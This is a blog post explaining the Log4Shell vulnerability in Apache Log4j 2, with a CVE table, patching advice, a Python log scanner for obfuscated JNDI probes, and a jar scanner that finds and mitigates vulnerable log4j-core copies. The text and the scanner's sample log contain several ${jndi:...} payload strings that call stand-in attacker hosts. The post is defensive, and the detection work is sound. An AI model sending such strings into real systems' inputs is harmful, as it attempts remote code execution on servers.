Brandon Travis


Log4j vulnerability and what it means

Last updated on: Thursday, December 23, 2021

Log4j has been in the news recently because of a zero-day that affects a large number of servers on the internet. The vulnerability, now known as Log4Shell, was publicly disclosed on December 10th; funnily enough, it was first used by attackers to have fun on Minecraft servers, where a crafted string typed into the in-game chat was enough to trigger it. Exploitation of Minecraft servers has been observed since at least December 1st of this year.

What is this Log4Shell Vulnerability?

Log4Shell is a vulnerability in the popular logging package Apache Log4j 2, a library used in many well-known Java applications for error logging and performance monitoring. It allows remote code execution: an attacker who can get a crafted string into a log message can make the server run code of their choosing, which is as scary as it sounds. Apache pushed out a patch (Log4j 2.15.0) for this vulnerability, CVE-2021-44228, but the fix turned out to be incomplete and left part of the problem exploitable; that remainder was tracked as a new report, CVE-2021-45046, and fixed in 2.16.0. Since then Apache has released a third fix, 2.17.0, for CVE-2021-45105, a denial-of-service issue summarized in the vulnerability table below.

Apache gave CVE-2021-44228 a CVSS score of 10/10, the maximum possible. If your servers are still not patched against it, which I hope is no longer the case, you should update to the latest Log4j version as soon as possible.

Risks of Log4Shell

The exploit allows a remote attacker to send a request containing a malicious string, a JNDI lookup of the form ${jndi:ldap://attacker-host/x}, to a server running a vulnerable version of Log4j. If any part of that request (a User-Agent header, a username, a chat message) ends up in a log message, Log4j resolves the lookup, connects to the attacker's server, and can be made to load and run attacker-supplied code, giving the attacker a foothold such as a reverse shell.

The ease with which this exploit can be executed is one of the largest factors adding to its severity. No advanced skills are needed: a person with almost no skill can take a malicious string from anywhere on the internet and paste it into any input that is likely to be logged.
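As an added example (not code from the original post or from the Log4j project), here is a small Python scanner a detection engineer could run over web-server access logs to flag Log4Shell probes. It handles the obfuscated forms that a plain substring search for ${jndi: misses: URL encoding, ${${lower:j}ndi:...} and ${${::-j}ndi:...}, which Log4j's recursive lookup evaluation turns back into "jndi" before the lookup runs. The log lines, the 203.0.113.x addresses and the name attacker.example are constructed for the example.

```python
"""Spot Log4Shell probes in web-server access logs.

Added example for this post, not code from the original article or from the
Log4j project.  The access-log lines below are constructed; 203.0.113.0/24 and
attacker.example are documentation-only addresses/names.
"""
import re
from urllib.parse import unquote

# Log4j evaluates ${...} lookups recursively, so attackers hide the literal
# "jndi" behind inner lookups.  ${lower:X} / ${upper:X} evaluate to X (case
# aside); ${anything:-X} evaluates to the default X when "anything" is unset,
# which is how ${::-j} becomes "j".
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalisation we expect ${jndi:<scheme>:<target>} with an optional //.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(?://)?([^/}\s]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and the inner lookups used to obfuscate "jndi".

    Repeats until nothing changes; bounded because the input is hostile."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        decoded = _CASE_LOOKUP.sub(r"\1", decoded)
        decoded = _DEFAULT_VALUE.sub(r"\1", decoded)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi(line: str):
    """Return [(scheme, target), ...] for every JNDI lookup in one log line."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan(lines):
    """Return (line_index, scheme, target) for each hit across a whole log."""
    hits = []
    for i, line in enumerate(lines):
        for scheme, target in find_jndi(line):
            hits.append((i, scheme, target))
    return hits


# Constructed sample log (Apache combined format).  Lines 0, 1 and 3 carry a
# probe in the User-Agent, the query string (URL-encoded) and the Referer.
LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:13:37:00 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '203.0.113.6 - - [10/Dec/2021:13:38:00 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi'
    '%3Armi%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.7 - - [10/Dec/2021:13:39:00 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:13:40:00 +0000] "POST /api HTTP/1.1" 200 10 '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}" "-"',
]


if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else LOG_LINES
    for idx, scheme, target in scan(lines):
        print(f"line {idx}: JNDI {scheme} lookup to {target}")
```

Run it with a path to an access log to scan a real file; with no argument it scans the constructed sample. A hit tells you which callback host to block and hunt for in outbound DNS and LDAP/RMI traffic, which is the part of the exploit chain that has to leave your network.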

Current Vulnerability List of Log4j

Vulnerability     Fixed in   Description
CVE-2021-45105    2.17.0     Uncontrolled recursion when evaluating self-referential lookups in Thread Context Map data (non-default configurations); crafted input causes a StackOverflowError and a denial of service
CVE-2021-45046    2.16.0     Incomplete fix for CVE-2021-44228 in 2.15.0: with certain non-default Pattern Layout configurations (Thread Context lookups), crafted input could still trigger JNDI lookups, leading to information leak and remote code execution in some environments
CVE-2021-44228    2.15.0     Remote code execution through JNDI lookups in the basic message lookup substitution; any attacker-controlled string that reaches a log message can trigger it

To ensure that you are protected against Log4Shell, update the software and libraries that you or your company use; at the time of writing that means Log4j 2.17.0 or later. Earlier workarounds, such as setting the log4j2.formatMsgNoLookups property, turned out not to cover CVE-2021-45046, so upgrading is the only complete fix. Don't be the one company that ends up on the news for not patching a well-known vulnerability until it is too late.
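Knowing what to update is the hard part, because log4j-core is often bundled inside application WARs and fat jars rather than sitting in a visible lib directory. As an added example (not code from the original post or an Apache tool), the Python script below walks a directory tree, reads the log4j-core version from each archive's Maven metadata, recurses into nested jars, and reports each copy as patched (2.17.0 or later), mitigated (JndiLookup.class removed, Apache's stop-gap for hosts that cannot upgrade immediately) or vulnerable. make_fake_jar() builds constructed test archives so the script can be exercised offline; the FIXED threshold covers the main 2.x line only and is an assumption of this example, since the Java 6/7 backport lines (2.3.x, 2.12.x) have their own fixed versions.

```python
"""Find Log4j 2 jars on disk, report their status, and apply the stop-gap
mitigation of removing JndiLookup.class.

Added example for this post, not code from the original article or an Apache
tool.  make_fake_jar() produces constructed test data; scan_path() is for real
directory trees.
"""
import io
import os
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear")
# 2.17.0 fixes CVE-2021-44228, -45046 and -45105 on Java 8+.  Assumption of this
# example: the Java 7/6 backports (2.12.x, 2.3.x) are not handled and would be
# reported as vulnerable; they need their own thresholds.
FIXED = (2, 17, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1), padded to three parts; None if unparsable."""
    parts = text.strip().split(".")[:3]
    parts += ["0"] * (3 - len(parts))
    try:
        return tuple(int(p) for p in parts)
    except ValueError:
        return None


def log4j_core_version(zf):
    """Version from Maven pom.properties; None if this is not log4j-core."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return parse_version(line.split("=", 1)[1])
    return None


def assess(zf, name):
    """Classify an open archive, recursing into nested jars (fat jars,
    WEB-INF/lib) that filename-based scanners miss."""
    findings = []
    names = zf.namelist()
    version = log4j_core_version(zf)
    if version is not None:
        if version >= FIXED:
            status = "patched"
        elif JNDI_LOOKUP not in names:
            status = "mitigated"   # lookup class removed: no path to JNDI
        else:
            status = "vulnerable"
        findings.append((name, ".".join(map(str, version)), status))
    for entry in names:
        if entry.endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(entry))) as inner:
                    findings.extend(assess(inner, f"{name}!/{entry}"))
            except zipfile.BadZipFile:
                continue
    return findings


def assess_file(path_or_file, name):
    """Open an archive from a path or file object and assess it."""
    with zipfile.ZipFile(path_or_file) as zf:
        return assess(zf, name)


def scan_path(root):
    """Assess every archive under a directory tree."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.endswith(ARCHIVES):
                path = os.path.join(dirpath, fname)
                try:
                    results.extend(assess_file(path, path))
                except zipfile.BadZipFile:
                    continue
    return results


def strip_jndi_lookup(src, dst=None):
    """Copy a jar without JndiLookup.class (same effect as Apache's stop-gap
    'zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class').
    Not a substitute for upgrading.  Returns the destination file object."""
    dst = dst if dst is not None else io.BytesIO()
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            if item.filename != JNDI_LOOKUP:
                zout.writestr(item, zin.read(item.filename))
    dst.seek(0)
    return dst


def make_fake_jar(version, with_jndi=True, nested_in=None):
    """Constructed test data: a minimal archive shaped like log4j-core; with
    nested_in set it is wrapped inside an outer archive at that entry name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP, b"placeholder, not a real class file")
    if nested_in:
        outer = io.BytesIO()
        with zipfile.ZipFile(outer, "w") as war:
            war.writestr(nested_in, buf.getvalue())
        buf = outer
    buf.seek(0)
    return buf


if __name__ == "__main__":
    import sys
    for name, version, status in scan_path(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{status:10} {version:8} {name}")
```

Point it at an application directory (or a whole filesystem) and treat every "vulnerable" line as an upgrade task; "mitigated" copies still need to be upgraded, because removing the class only closes the JNDI path and does nothing for the recursion bug in CVE-2021-45105.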


Copyright © Brandon-travis.com 2022.